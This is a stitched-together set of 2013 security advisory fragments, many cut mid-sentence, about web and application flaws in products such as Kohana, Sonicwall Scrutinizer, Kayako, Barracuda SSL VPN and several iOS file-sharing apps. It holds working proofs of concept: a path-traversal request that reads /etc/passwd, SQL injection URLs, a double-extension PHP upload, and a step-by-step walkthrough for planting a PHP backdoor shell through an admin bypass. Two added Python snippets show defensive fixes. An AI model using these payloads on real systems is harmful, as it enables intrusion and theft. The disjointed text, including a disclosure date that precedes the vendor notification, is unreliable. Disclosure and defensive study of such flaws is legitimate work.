Remote attackers can bypass the validation through the vulnerable replace function in the file browser to read local web server files via a directory (path) traversal attack. Exploitation of the vulnerability requires no privileged application user account and no user interaction. Successful exploitation of the vulnerability results in the reading of arbitrary system files and compromise of the web server.

Vulnerable Module(s):
  [+] Filebrowser

Vulnerable Function(s):
  [+] str_replace dir

Vulnerable Parameter(s):
  [+] ?path

Proof of Concept:
=================
The vulnerability can be exploited by remote attackers without a privileged application user account and without user interaction. For demonstration or reproduce ...

Review: Kohana/Filebrowser.php

$thumb = Route::get('wysiwyg/filebrowser')->uri(array(
    'action' => 'thumb',
    'path'   => str_replace(array($dir, DIRECTORY_SEPARATOR), array('', '/'), $filename)
));

Review: GET Request

GET http://media.[server].com/directory/graphics/?path=..%2F..%2F..%2F%2F..%2F..%2F%2F..%2F..%2F%2F..%2F..%2F%2F..%2F..%2F%2F%2Fetc%2Fpasswd HTTP/1.0
Host: media.[server].com
User-Agent: Kami VL

PoC:
http://media.[server].com/directory/graphics/?path=..%2F..%2F..%2F%2F..%2F..%2F%2F..%2F..%2F%2F..%2F..%2F%2F..%2F..%2F%2F%2Fetc%2Fpasswd

Risk:
=====
The security risk of the directory traversal web vulnerability is estimated as high(+).

Credits:
========
Vulnerability Laboratory [Research Team] - Karim B. (k...@vulnerability-lab.com)
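The str_replace() in the review above rewrites the path string but never checks where the resulting path points. The following is an added example (not Kohana's code) of the containment check a file browser needs: resolve the requested path against the allowed base directory and verify the canonical result is still inside it. The base directory, the sample file and the helper names are constructed for the demo; the traversal value is the advisory's own PoC, URL-decoded once.

```python
"""Added example (not Kohana's own code): a containment check for the ?path
parameter instead of the string rewrite shown in the advisory.

Assumed: the base directory, the 'graphics/logo.png' sample file and the
helper names are constructed for this demo.
"""
import os
import tempfile
from typing import Optional
from urllib.parse import unquote

# The ?path= value from the advisory's PoC, URL-decoded once (as a web
# server would decode it before the application sees it).
POC_PATH = unquote(
    "..%2F..%2F..%2F%2F..%2F..%2F%2F..%2F..%2F%2F..%2F..%2F%2F..%2F..%2F%2F%2Fetc%2Fpasswd"
)


def advisory_style_rewrite(base_dir: str, filename: str) -> str:
    """Mirror of the str_replace() in the advisory: drop the base directory
    prefix and normalise separators to '/'. It rewrites the string but
    performs no check on where the resulting path leads."""
    return filename.replace(base_dir, "").replace(os.sep, "/")


def resolve_in_base(base_dir: str, requested: str) -> Optional[str]:
    """Return the canonical absolute path if `requested` stays inside
    base_dir, otherwise None.

    realpath() collapses '..' segments and resolves symlinks, so the
    comparison is made on the path the OS would actually open, not on
    the text the client sent."""
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, requested.lstrip("/")))
    if candidate == base or candidate.startswith(base + os.sep):
        return candidate
    return None


def demo() -> dict:
    """Run a legitimate request and the advisory's PoC value through the
    check in a throwaway directory and report both outcomes."""
    with tempfile.TemporaryDirectory() as base:
        os.makedirs(os.path.join(base, "graphics"))
        sample = os.path.join(base, "graphics", "logo.png")
        with open(sample, "wb") as fh:
            fh.write(b"constructed sample content")
        legit = resolve_in_base(base, advisory_style_rewrite(base, sample))
        traversal = resolve_in_base(base, advisory_style_rewrite(base, POC_PATH))
        return {
            "legit_allowed": legit == os.path.realpath(sample),
            "traversal_blocked": traversal is None,
        }


if __name__ == "__main__":
    print(demo())
```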
0day full - Free Monthly Websites v2.0 - Multiple Web Vulnerabilities
Navigation Page.
Picture: http://i45.tinypic.com/vigzsp.png

3rd. Still on the same page, scroll down until you see this section: Sort Your Page Buttons/Links.
Pic: http://i46.tinypic.com/1040oxg.png
Change FROM dwi.php.html TO /dwi.php, then click Sort Navigation Pages.
Picture: http://i49.tinypic.com/24ec1l0.jpg

4th. Go to Edit Navigation Page.
http://www.massmoneywebsites.com/admin/edit_main_pages.php
Please Select a Page To Edit: dwi.php.html --- Select that page.

5th. Inspect element on dwi.php.html
Pic: http://i50.tinypic.com/29pq1ix.png
Change FROM
  <option value="dwi.php.html" selected="dwi.php.html"></option>
To
  <option value="dwi.php" selected="dwi.php"></option>
Picture: http://i47.tinypic.com/wtb0j6.png

6th. Enter A Page Title As You Would Like It To Be Seen: fill with dwi.php
URL For This Page: main_pages/dwi.php
Use the 'URL For This Page' field above: [Tick]
Display This Page in Left Vertical Site Navigation: [Tick]
Display This Page in Top Horizontal Site Navigation Buttons: [Tick]
Picture: http://i46.tinypic.com/1zebnle.png

7th. Still on the same page, scroll down until you see this section: Enter Content For Your Page. Click the SOURCE button, press Enter twice at the first line, then paste your PHP Backdoor/PHP Shell below, and press Enter twice at the last line.
*Please see the 2 pictures below if you don't understand :p
Picture 1: http://i49.tinypic.com/1zlzxq0.png
Picture 2: http://i48.tinypic.com/291kc9h.png
If you wanna do this, please remove your backdoor password.
Click Save edited navigation page.

8th. After the message "Data saved successfully" appears, visit the Home Page and you will see the Backdoor Page.
Picture: http://i49.tinypic.com/4rt1g4.png

Risk:
=====
The security risk of the unauthorized file upload vulnerability via auth bypass is estimated as critical.
Credits:
========
X-Cisadane - (stefanus...@ymail.com)

Greetz 2:
=========
X-Code, Borneo Crew, Depok Cyber, Explore Crew, CodeNesia, Bogor-H, Jakarta Anonymous Club and Ngobas
Sonicwall Scrutinizer v9.5.2 - SQL Injection Vulnerability
Title:
======
Sonicwall Scrutinizer v9.5.2 - SQL Injection Vulnerability

Date:
=====
2013-02-13

References:
===========
http://www.vulnerability-lab.com/get_content.php?id=789

#9984: Investigate Vulnerability Lab issues (this ticket included tracking the creation of our DBI shim to error on semi-colon)
#10149: Create a common function to escape characters that can be used for SQL injection
#10139: Review all mapping and flow analytics queries to make sure inputs included in SQL are escaped
#10141: Review all reporting and filtering queries to make sure inputs included in SQL are escaped
#10140: Review all alarm tab and admin tab queries to make sure inputs included in SQL are escaped

VL-ID:
======
789

Common Vulnerability Scoring System:
====================================
7.3

Introduction:
=============
Dell SonicWALL Scrutinizer is a multi-vendor, flow-based application traffic analytics, visualization and reporting tool to measure and troubleshoot network performance and utilization while increasing productivity for enterprises and service providers. Scrutinizer supports a wide range of routers, switches, firewalls, and data-flow reporting protocols, providing unparalleled insight into application traffic analysis from IPFIX/NetFlow data exported by Dell SonicWALL firewalls, as well as support for a wide range of routers, switches, firewalls, and data-flow reporting protocols. IT administrators in charge of high throughput networks can deploy Scrutinizer as a virtual appliance for high performance environments.

(Copy of the Vendor Homepage: http://www.sonicwall.com/us/en/products/Scrutinizer.html )

Abstract:
=========
The Vulnerability Laboratory Research Team discovered an SQL Injection vulnerability in Dell's Sonicwall OEM Scrutinizer v9.5.2 appliance application.

Report-Timeline:
================
2012-12-05: Researcher Notification & Coordination
2012-12-07: Vendor Notification
2013-01-08: Vendor Response/Feedback
2013-02-10: Vendor Fix/Patch
2013-02-11: Public Disclosure

Status:
=======
Published

Affected Products:
==================
DELL
Product: Sonicwall OEM Scrutinizer 9.5.2

Exploitation-Technique:
=======================
Remote

Severity:
=========
High

Details:
========
A blind SQL Injection vulnerability was detected in the Sonicwall OEM Scrutinizer v9.5.2 appliance application. The bug allows remote attackers to inject and execute their own SQL statements/commands to manipulate the affected application DBMS. The SQL injection vulnerability is located in the fa_web.cgi file, in the bound gadget listing module, with the vulnerable orderby and gadget parameters. Exploitation requires no user interaction and no privileged application user account. Successful exploitation of the remote SQL vulnerability results in DBMS and application compromise.

Vulnerable File(s):
  [+] fa_web.cgi

Vulnerable Module(s):
  [+] gadget listing

Vulnerable Parameter(s):
  [+] orderby
  [+] gadget

Proof of Concept:
=================
The remote SQL injection vulnerability can be exploited by remote attackers without a privileged application user account and without user interaction. For demonstration or reproduce ...

PoC:
http://127.0.0.1:1339/cgi-bin/fa_web.cgi?gadget=applicationsbytes-1%27[SQL INJECTION VULNERABILITY!]&orderby=1&cachebreaker=23_52_5_814-1%27
http://127.0.0.1:1339/cgi-bin/fa_web.cgi?gadget=applicationsbytes&orderby=-1%27[SQL INJECTION VULNERABILITY!]&cachebreaker=23_52_5_814-1%27

Solution:
=========
1) The Scrutinizer team created its own DB layer that will die if a semicolon is found within an SQL query.
2) We have changed more queries to pass inputs as bound variables to the DB engine, which prevents possible SQL injection.

Risk:
=====
The security risk of the remote SQL injection vulnerability is estimated as high(+).

Credits:
========
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (b...@vulnerability-lab.com)
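The two fixes listed under Solution, bound variables and a DB layer that dies on a semicolon, applied to a small SQLite stand-in for the fa_web.cgi gadget listing. This is an added example, not Scrutinizer's code: the `gadgets` table, its columns and the `ORDERBY_ALLOWED` map are constructed for the demo. It also shows why the `orderby` parameter needs an allowlist rather than binding (a bound ORDER BY term is a constant, so it sorts nothing), and that the PoC request values carry no semicolon, so the semicolon check alone would not have stopped them.

```python
"""Added example (not Scrutinizer's code): the advisory's two fixes applied
to a small SQLite stand-in for the fa_web.cgi gadget listing.

Assumed: the `gadgets` table, its columns and ORDERBY_ALLOWED are
constructed for this demo; the real schema is not on the page.
"""
import sqlite3
from typing import List, Tuple

# Request value prefixes taken from the advisory's PoC URLs (the part
# before the [SQL INJECTION VULNERABILITY!] placeholder).
POC_GADGET = "applicationsbytes-1'"
POC_ORDERBY = "-1'"

# `orderby` names a column. Identifiers cannot be bound, so map request
# values onto known column names and reject everything else.
ORDERBY_ALLOWED = {"1": "bytes", "2": "flows"}


def open_demo_db() -> sqlite3.Connection:
    """In-memory table with constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE gadgets (gadget TEXT, bytes INTEGER, flows INTEGER)")
    conn.executemany(
        "INSERT INTO gadgets VALUES (?, ?, ?)",
        [("applicationsbytes", 900, 3), ("applicationsbytes", 100, 7), ("topflows", 500, 1)],
    )
    return conn


def list_gadget_vulnerable(conn, gadget: str, orderby: str) -> List[Tuple]:
    """'Before' shape: request values pasted into the SQL text, so a quote
    in `gadget` reaches the SQL parser (the advisory's finding)."""
    sql = f"SELECT gadget, bytes FROM gadgets WHERE gadget = '{gadget}' ORDER BY {orderby}"
    return conn.execute(sql).fetchall()


def list_gadget_fixed(conn, gadget: str, orderby: str) -> List[Tuple]:
    """'After' shape: the value is bound, the identifier comes from an allowlist."""
    column = ORDERBY_ALLOWED.get(orderby)
    if column is None:
        raise ValueError("orderby is not an allowed column")
    sql = f"SELECT gadget, bytes FROM gadgets WHERE gadget = ? ORDER BY {column}"
    return conn.execute(sql, (gadget,)).fetchall()


def list_gadget_bound_orderby(conn, gadget: str, orderby: str) -> List[Tuple]:
    """Common mistake: binding the ORDER BY term. The bound value is a constant
    expression, so rows come back in scan order and no error is raised."""
    sql = "SELECT gadget, bytes FROM gadgets WHERE gadget = ? ORDER BY ?"
    return conn.execute(sql, (gadget, orderby)).fetchall()


def has_semicolon(sql: str) -> bool:
    """The advisory's first fix (a DB layer that dies on ';') as a predicate."""
    return ";" in sql


def demo() -> dict:
    """Exercise all three query shapes with the PoC values and a legitimate one."""
    conn = open_demo_db()
    out = {}
    try:
        list_gadget_vulnerable(conn, POC_GADGET, "1")
        out["vulnerable_quote_reaches_parser"] = False
    except sqlite3.OperationalError:
        out["vulnerable_quote_reaches_parser"] = True  # unbalanced quote: SQL syntax error
    out["fixed_rows_for_poc_gadget"] = list_gadget_fixed(conn, POC_GADGET, "1")  # no such gadget
    out["fixed_rows_sorted"] = list_gadget_fixed(conn, "applicationsbytes", "1")
    try:
        list_gadget_fixed(conn, "applicationsbytes", POC_ORDERBY)
        out["fixed_rejects_poc_orderby"] = False
    except ValueError:
        out["fixed_rejects_poc_orderby"] = True
    out["bound_orderby_rows"] = list_gadget_bound_orderby(conn, "applicationsbytes", "bytes")
    # Neither PoC value contains ';', so the semicolon check alone is not the protection.
    out["poc_has_semicolon"] = has_semicolon(POC_GADGET) or has_semicolon(POC_ORDERBY)
    return out


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```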
MyFi Wireless Disk 1.2 iPad iPhone - Multiple Vulnerabilities
Title:
======
MyFi Wireless Disk 1.2 iPad iPhone - Multiple Vulnerabilities

Date:
=====
2013-02-13

References:
===========
http://www.vulnerability-lab.com/get_content.php?id=864

VL-ID:
======
864

Status:
=======
Published

Copyright © 2013 | Vulnerability Laboratory
Kayako Fusion v4.51.1891 - Multiple Web Vulnerabilities
[PERSISTENT INJECTED SCRIPT CODE!]%20%20%20%20[PERSISTENT INJECTED SCRIPT CODE!])</div></div></div>
<div id="gridcontentcustomfieldgroupgrid"><form name="form_customfieldgroupgrid" id="form_customfieldgroupgrid" action="http://rem0ve.137.0.0.1:8080/admin/Base/CustomFieldGroup/Manage//" method="post" onsubmit="javascript: return false;"><input autocomplete="OFF" name="csrfhash" value="z2hvplh1kar0dm8rzvwmln0ilddeunsc" type="hidden"><div id="widthwrapper" style="width: 100%;"><div id="gridtoolbar"><div class="gridtoolbarnew" id="gridextendedtoolbar"><div class="gridtoolbarsub"><ul><li><a href="http://rem0ve.137.0.0.1:8080/admin/Base/CustomFieldGroup/Insert" viewport="1"><img src="Manage-Dateien/icon_addplus.gif" align="absmiddle" border="0"> New</a></li></ul></div></div>

Reference(s):
http://rem0ve.137.0.0.1:8080/admin/Base/CustomFieldGroup/Manage

Review: Live-Chat - Visitor Group Title

<div id="" class="dialogcontainer"><div class="dialogok"></div><div class="dialogokcontainer"><div class="dialogtitle">Inserted Visitor Group [PERSISTENT INJECTED SCRIPT CODE!]%20%20%20%20[PERSISTENT INJECTED SCRIPT CODE!])</div>

... or

<div class="ui-dialog-titlebar ui-widget-header ui-corner-all ui-helper-clearfix"><span id="ui-dialog-title-window_editgroup" class="ui-dialog-title"><img src="http://rem0ve.137.0.0.1:8080/__swift/themes/__cp/images/icon_window.gif" align="absmiddle" border="0"> Edit Visitor Group: [PERSISTENT INJECTED SCRIPT CODE!]%20%20%20%20[PERSISTENT INJECTED SCRIPT CODE!]) [PERSISTENT INJECTED SCRIPT CODE!]</span>

Reference(s):
http://rem0ve.137.0.0.1:8080/admin/LiveChat/Group/Manage

Risk:
=====
The security risk of the persistent input validation web vulnerabilities is estimated as medium(+).

Credits:
========
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (b...@vulnerability-lab.com)
Copyright © 2013 | Vulnerability Laboratory
TagScanner v5.1 - Stack Buffer Overflow Vulnerability
=00410041 edx=779cb46d esi= edi= eip=41414141 esp=0018ea90 ebp=0018eab0 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246
Tagscan+0x10041:
41414141 add byte ptr [eax],al ds:002b:=??

0:000> !exchain
0018eaa4: ntdll!LdrRemoveLoadAsDataTable+d64 (779cb46d)
0018eed0: Tagscan+14420 (00414420)
0018eef0: Tagscan+1ead78 (005ead78)
0018f154: Tagscan+10041 (41414141)
Invalid exception stack at 41414141

0:000> u
Tagscan+0x10041:
41414141 add byte ptr [eax],al
00410043 00ac004100 add byte ptr [eax+eax+41h],ch
0041004a add byte ptr [eax],al
0041004c add byte ptr [eax],al
0041004e add byte ptr [eax],al
00410050 add byte ptr [eax],al
00410052 add byte ptr [eax],al
00410054 94 xchg eax,esp

0:000> a 41414141

--- APPCrash Logs ---
EventType=APPCRASH (BEX)
EventTime=130029411726060019
ReportType=2
Consent=1
ReportIdentifier=ddec5c9b-6102-11e2-adfe-efaefe8363dd
IntegratorReportIdentifier=ddec5c9a-6102-11e2-adfe-efaefe8363dd
WOW64=1
Response.type=4
Sig[0].Name=Anwendungsname
Sig[0].Value=Tagscan.exe
Sig[1].Name=Anwendungsversion
Sig[1].Value=5.1.6.30
Sig[2].Name=Anwendungszeitstempel
Sig[2].Value=50f57b7e
Sig[3].Name=Fehlermodulname
Sig[3].Value=Tagscan.exe
Sig[4].Name=Fehlermodulversion
Sig[4].Value=5.1.6.30
Sig[5].Name=Fehlermodulzeitstempel
Sig[5].Value=50f57b7e
Sig[6].Name=Ausnahmecode
Sig[6].Value=c005
Sig[7].Name=Ausnahmeoffset
Sig[7].Value=41414141
DynamicSig[1].Name=Betriebsystemversion
DynamicSig[1].Value=6.1.7601.2.1.0.768.3
DynamicSig[2].Name=Gebietsschema-ID
DynamicSig[2].Value=1031
DynamicSig[22].Name=Zusatzinformation 1
DynamicSig[22].Value=c9ed
DynamicSig[23].Name=Zusatzinformation 2
DynamicSig[23].Value=c9ed9ec450d4be6144400a9541f5eddb
DynamicSig[24].Name=Zusatzinformation 3
DynamicSig[24].Value=04ae
DynamicSig[25].Name=Zusatzinformation 4
DynamicSig[25].Value=04ae339f4a83b6a3d3bf04a428f6874f
UI[2]=C:\Program Files (x86)\TagScanner\Tagscan.exe
UI[3]=Ultimate TagScanner funktioniert nicht mehr
UI[4]=Windows kann online nach einer Lösung für das Problem suchen.
UI[5]=Online nach einer Lösung suchen und das Programm schließen
UI[6]=Später online nach einer Lösung suchen und das Programm schließen
UI[7]=Programm schließen
LoadedModule[0]=C:\Program Files (x86)\TagScanner\Tagscan.exe
LoadedModule[62]=C:\Program Files (x86)\TagScanner\plugins\bass_aac.dll
LoadedModule[63]=C:\Program Files (x86)\TagScanner\plugins\bass_alac.dll
LoadedModule[64]=C:\Program Files (x86)\TagScanner\plugins\bass_ape.dll
LoadedModule[65]=C:\Program Files (x86)\TagScanner\plugins\bass_mpc.dll
LoadedModule[66]=C:\Program Files (x86)\TagScanner\plugins\bass_ofr.dll
LoadedModule[67]=C:\Program Files (x86)\TagScanner\OptimFROG.dll
LoadedModule[68]=C:\Program Files (x86)\TagScanner\plugins\bass_spx.dll
LoadedModule[69]=C:\Program Files (x86)\TagScanner\plugins\bass_tta.dll
LoadedModule[70]=C:\Program Files (x86)\TagScanner\plugins\bass_wv.dll
LoadedModule[71]=C:\Program Files (x86)\TagScanner\plugins\bassflac.dll
LoadedModule[72]=C:\Program Files (x86)\TagScanner\plugins\basswma.dll
LoadedModule[73]=C:\Program Files (x86)\TagScanner\plugins\bassopus.dll
LoadedModule[74]=C:\Windows\system32\mswsock.dll
LoadedModule[75]=C:\Windows\System32\wshtcpip.dll
LoadedModule[76]=C:\Windows\system32\DNSAPI.dll
LoadedModule[77]=C:\Program Files (x86)\Bonjour\mdnsNSP.dll
LoadedModule[78]=C:\Windows\system32\Iphlpapi.DLL
LoadedModule[79]=C:\Windows\system32\WINNSI.DLL
LoadedModule[80]=C:\Windows\system32\rasadhlp.dll
LoadedModule[81]=C:\Windows\System32\wship6.dll
LoadedModule[82]=C:\Windows\system32\avrt.dll
FriendlyEventName=Nicht mehr funktionsfähig
ConsentKey=APPCRASH
AppName=Ultimate TagScanner
AppPath=C:\Program Files (x86)\TagScanner\Tagscan.exe

Solution:
=========
The vulnerability can be patched by restricting the input fields that are processed when loading the "rename folder by tag" listing.

Risk:
=====
The security risk of the local buffer overflow vulnerability is estimated as high(-).
Credits:
========
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (b...@vulnerability-lab.com)
MailOrderWorks v5.907 - Multiple Web Vulnerabilities
Credits:
========
Vulnerability Laboratory [Research Team] - Ibrahim El-Sayed (the_storm) [st...@vulnerability-lab.com] [iel-sayed.blogspot.com]
Wireless Disk PRO v2.3 iOS - Multiple Web Vulnerabilities
) to implement/inject malicious script code on the application side (persistent) of the app web service. The vulnerability is located in the index file dir listing module of the webserver (http://localhost:6566/) when processing to display filenames that were injected and manipulated via the POST request method. The persistent script code is executed from the main index file dir listing module when the service lists the new malicious filename as an item. Exploitation of the persistent web vulnerability requires low or medium user interaction and no application user account. Successful exploitation of the vulnerability can lead to persistent session hijacking (customers), account theft via persistent web attacks, persistent phishing or stable (persistent) certificate mail notification context manipulation.

Vulnerable Application(s):
[+] Wireless Disk PRO v2.3 - ITunes or AppStore (Apple)

Vulnerable Module(s):
[+] File Upload (Web Server) [Remote]

Vulnerable Parameter(s):
[+] name

Affected Module(s):
[+] Filename - Index File Dir Listing

Proof of Concept:
=================
1.1 The file include web vulnerability can be exploited by remote attackers without application user account and also without user interaction.
For demonstration or reproduce ...

PoC: (POST)
-243701706111075
Content-Disposition: form-data; name=file; filename=[FILE/PATH INCLUDE WEB VULNERABILITY].png
Content-Type: image/gif
flag: 137

1.2 The command injection web vulnerability can be exploited by local privilege device user accounts with low required user interaction.
For demonstration or reproduce ...

DEVICE NAME: IPad360 ¥337

Standard Application Header:
<div id=header_bottom>The following files are the hosts live from IPad360 ¥337 WirelessDisk App Document folder</div>

Manipulated Application Header:
<div id=header_bottom>The following files are the hosts live from [COMMAND INJECTION VIA DEVICENAME!] WirelessDisk App Document folder</div>

1.3 The persistent script code injection web vulnerability can be exploited by remote attackers without application user account and with medium required user interaction.
For demonstration or reproduce ...

Review: Index File Dir Listing - Name
<table id=table1 border=0 cellpadding=1 cellspacing=2 width=741><tbody>
<tr><td style=width:461px;background-color:#ebebeb;> ?? <a href=327.png target=_blank>327.png</a></td><td style=width:100px;background-color:#e3e3e3;text-align:right;>27.27 KB</td><td style=width:180px;text-align:center;background-color:#ebebeb;>2013-02-11 08:07:16</td></tr>
<tr><td style=width:461px;background-color:#ebebeb;> ?? <a href=[PERSISTENT INJECTED SCRIPT CODE AS NAME!] target=_blank>[PERSISTENT INJECTED SCRIPT CODE AS NAME!]%20%20%20%20</a></td><td style=width:100px;background-color:#e3e3e3;text-align:right;>27.27 KB</td><td style=width:180px;text-align:center;background-color:#ebebeb;>2013-02-11 08:07:35</td></tr>

Risk:
=====
1.1 The security risk of the local file/path include web vulnerability via POST request method is estimated as critical.
1.2 The security risk of the local command injection vulnerability is estimated as high(-).
1.3 The security risk of the persistent input validation web vulnerability is estimated as medium(+).

Credits:
========
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (b...@vulnerability-lab.com)
File Lite 3.3 3.5 PRO iOS - Multiple Web Vulnerabilities
an application user account but low or medium user interaction. Successful exploitation results in client side cross site requests, unauthorized external redirects, client side phishing, client side session hijacking and client side module context manipulation.

Vulnerable Application(s):
[+] File Lite 3.3 3.5 PRO - ITunes or AppStore (Apple)

Vulnerable Module(s):
[+] Files - GET Request

Vulnerable Parameter(s):
[+] filename

Proof of Concept:
=================
1.1 The arbitrary file upload vulnerability can be exploited by remote attackers without required application user account or user interaction.
For demonstration or reproduce ...

PoC: POST REQUEST METHOD - FILE UPLOAD
Host=192.168.2.104:8080
User-Agent=Mozilla/5.0 (Windows NT 6.1; WOW64; rv:20.0) Gecko/20100101 Firefox/20.0
Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language=en-US,en;q=0.5
Accept-Encoding=gzip, deflate
DNT=1
Referer=http://192.168.2.104:8080/
Connection=keep-alive
Content-Type=multipart/form-data; boundary=---48201118910051
Content-Length=98447
POSTDATA =-48201118910051
Content-Disposition: form-data; name=newfile; filename=hacki-hack.png.txt.html.php.gif[FILE UPLOAD VULNERABILITY]
Content-Type: image/gif
?PNG
...

Review:
[{'name':'.Private', 'id':0},{'name':'1234.png.txt.iso.php.gif', 'id':1},{'name':'Recents', 'id':2},{'name':'benjamin.html', 'id':3}]

Reference(s):
http://localhost:8080/files

1.2 The persistent script code injection web vulnerability can be exploited by remote attackers without application user account and with low user interaction.
For demonstration or reproduce ...

PoC: File Name - Index Output Listing
<a href=http://192.168.2.104:8080/files/%3E%22%3Ciframe%20src=a%3E; class=file>[PERSISTENT SCRIPT CODE INJECT VULNERABILITY!] src=Welcome%20to%20Evereader%20Wi-Fi%20Sharing%21_files/hack.txt</a></td><td class='del'><form action='/files/%3E%22%3C[PERSISTENT SCRIPT CODE INJECT VULNERABILITY!]%3E' method='post'><input name='_method' value='delete' type='hidden'/><input name=commit type=submit value=Delete class='button' /></td></tr></tbody></table></iframe></a>

1.3 The client side script code injection web vulnerability can be exploited by remote attackers without application user account and with low or medium required user interaction.
For demonstration or reproduce ...

PoC: GET REQUEST METHOD - File Request
--- Request Header ---
Host=192.168.2.104:8080
User-Agent=Mozilla/5.0 (Windows NT 6.1; WOW64; rv:20.0) Gecko/20100101 Firefox/20.0
Accept=application/json, text/javascript, */*
Accept-Language=en-US,en;q=0.5
Accept-Encoding=gzip, deflate
DNT=1
X-Requested-With=XMLHttpRequest
Referer=http://192.168.2.104:8080/
Cookie=USERID=SCRIPTdocument.cookie=true/SCRIPT; true
Connection=keep-alive

--- Response Header ---
Status=OK - 200
Accept-Ranges=bytes
Content-Length=171
Cache-Control=private, max-age=0, must-revalidate
Content-Type=text/plain; charset=utf-8
Date=Fr., 26 Apr 2013 17:48:48 GMT

URL: http://localhost:8080/files?Fri%20Apr%2026%202013%2019:46:51%20GMT+0200

Solution:
=========
1.1 Parse the POST request when processing an upload of a file with a wrong extension, and disallow double extensions. Restrict access to web files like html, php or java-script. Implement dedicated exception handling to prevent future arbitrary file uploads.
1.2 Restrict the input/output of the del filename and file input parameters. Encode and parse the output of both vulnerable values to patch the issue.
1.3 Parse the parameter request with the flag details to fix the vulnerability in the GET request.

Risk:
=====
1.1 The security risk of the remote arbitrary file upload vulnerability is estimated as high(-).
1.2 The security risk of the persistent input validation web vulnerability is estimated as medium(+).
1.3 The security risk of the client side cross site scripting vulnerability is estimated as low(+).

Credits:
========
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (b...@vulnerability-lab.com) [www.vulnerability-lab.com]
Sony PS3 Firmware v4.31 - Code Execution Vulnerability
. The ps3 filter system of the SpeicherDaten (DienstProgramm) module does not recognize special chars and does not provide any kind of input restrictions. Attackers can manipulate the .sfo file of a save game to execute system specific commands or inject malicious persistent script code out of the save game preview listing. If you inject standard frames or system unknown commands (jailbreak) without passing the filter char by char and direct sync as update, you will fail to reproduce!

PoC: PARAM.SFO
PSF Ä @ h % , 4 $ C @ ( V h j € p t € ð ACCOUNT_ID ATTRIBUTE CATEGORY DETAIL PARAMS PARAMS2 PARENTAL_LEVEL SAVEDATA_DIRECTORY SAVEDATA_LIST_PARAM SUB_TITLE TITLE 40ac78551a88fdc SD PSHACK: Benjamin Ninja H%20'[PERSISTENT INJECTED SYSTEM COMMAND OR CODE!] Hackizeit: 1:33:07 ExpSkills: VL-LAB-TRAINING Operation: 1% Trojaners: 0%
...
Õõ~\˜òíA×éú;óç40ac78551a88fdc
...
BLES00371-NARUTO_STORM-0 HACKINGBKM 1 PSHACK: Benjamin Ninja H%20'[PERSISTENT INJECTED SYSTEM COMMAND OR CODE!];

Solution:
=========
Restrict the savegame name input and disallow special chars. Encode the savegame values when redisplaying them in the menu preview of the game. Parse the strings and values from the savegames even if they are included string by string via sync.

Risk:
=====
The security risk of the highly exploitable but local vulnerability is estimated as critical and needs to be fixed soon.

Credits:
========
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (b...@vulnerability-lab.com)
Trend Micro DirectPass 1.5.0.1060 - Multiple Vulnerabilities
it was the 9th may. On the 18th we downloaded the main direct-pass software again and tested the core without an update, and it was still vulnerable. To fix the issue in the software, an update from the update-server is required after the install.

Risk:
=====
1.1 The security risk of the local command/path injection software vulnerability in the directpass software core is estimated as high(-).
1.2 The security risk of the persistent script code inject vulnerability is estimated as medium(+).
1.3 The security risk of the pointer (DoS) software vulnerability is estimated as medium(-).

Credits:
========
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (b...@vulnerability-lab.com)
Barracuda SSL VPN 680 2.2.2.203 - Redirect Web Vulnerability
Title:
======
Barracuda SSL VPN 680 2.2.2.203 - Redirect Web Vulnerability

Date:
=====
2013-05-25

References:
===========
http://www.vulnerability-lab.com/get_content.php?id=755
Barracuda Networks Security ID (BNSEC): 731

VL-ID:
======
755

Common Vulnerability Scoring System:
====================================
1.3

Introduction:
=============
The Barracuda SSL VPN is an integrated hardware and software solution enabling secure, clientless remote access to internal network resources from any Web browser. Designed for remote employees and road warriors, the Barracuda SSL VPN provides comprehensive control over file systems and Web-based applications requiring external access. The Barracuda SSL VPN integrates with third-party authentication mechanisms to control user access levels and provides single sign-on.

Barracuda SSL VPN
* Enables access to corporate intranets, file systems or other Web-based applications
* Tracks resource access through auditing and reporting facilities
* Scans uploaded files for viruses and malware
* Leverages multi-factor, layered authentication mechanisms, including RSA SecurID and VASCO tokens
* Integrates with existing Active Directory and LDAP directories
* Utilizes policies for granular access control framework
* Supports any Web browser on PC or Mac

(Copy of the Vendor Homepage: http://www.barracudanetworks.com/ns/products/sslvpn.php)

Abstract:
=========
The Vulnerability Laboratory Research Team discovered a redirect vulnerability in the official Barracuda Networks SSL VPN 680 v2.2.2.203.

Report-Timeline:
================
2012-11-11: Researcher Notification & Coordination
2012-11-12: Vendor Notification
2012-11-19: Vendor Response/Feedback
2013-02-20: Vendor Fix/Patch
2012-05-27: Public Disclosure

Status:
=======
Published

Affected Products:
==================
Barracuda Networks
Product: SSL VPN 680 2.2.2.203

Exploitation-Technique:
=======================
Remote

Severity:
=========
Low

Details:
========
A remote (external) redirection vulnerability is detected in the Barracuda SSL VPN 680 v2.2.2.203 (Vx) Web Application Appliance.
The bug allows remote attackers to prepare links to client-side external redirects with malware, phishing websites or malicious web context. The vulnerability is located in the resourceId parameter request when processing to load an internal `returnTo` file redirect via the GET method.

Vulnerable Module(s):
[+] launchApplication.do [resourceId]

Vulnerable Parameter(s):
[+] returnTo

Proof of Concept:
=================
The vulnerability can be exploited by remote attackers without a privileged application user account but with medium or high required user interaction.
For demonstration or reproduce ...

1.1 The first URL shows the standard request via GET
https://sslvpn.127.0.0.1:8080/launchApplication.do?resourceId=1&policy=1&returnTo=%2FshowApplicationShortcuts.do

1.2 The second URL shows the manipulated remote context via GET
https://sslvpn.127.0.0.1:8080/launchApplication.do?resourceId=1&policy=1&returnTo=http://www.vulnerability-lab.com

https://sslvpn.[SERVER]/[FILE].do?[RES+ID]=x&[POLICY]=x&returnTo=[EXTERNAL TARGET]

Solution:
=========
The vulnerability can be patched by allowing only local file requests when processing to load the vulnerable returnTo parameter via GET.
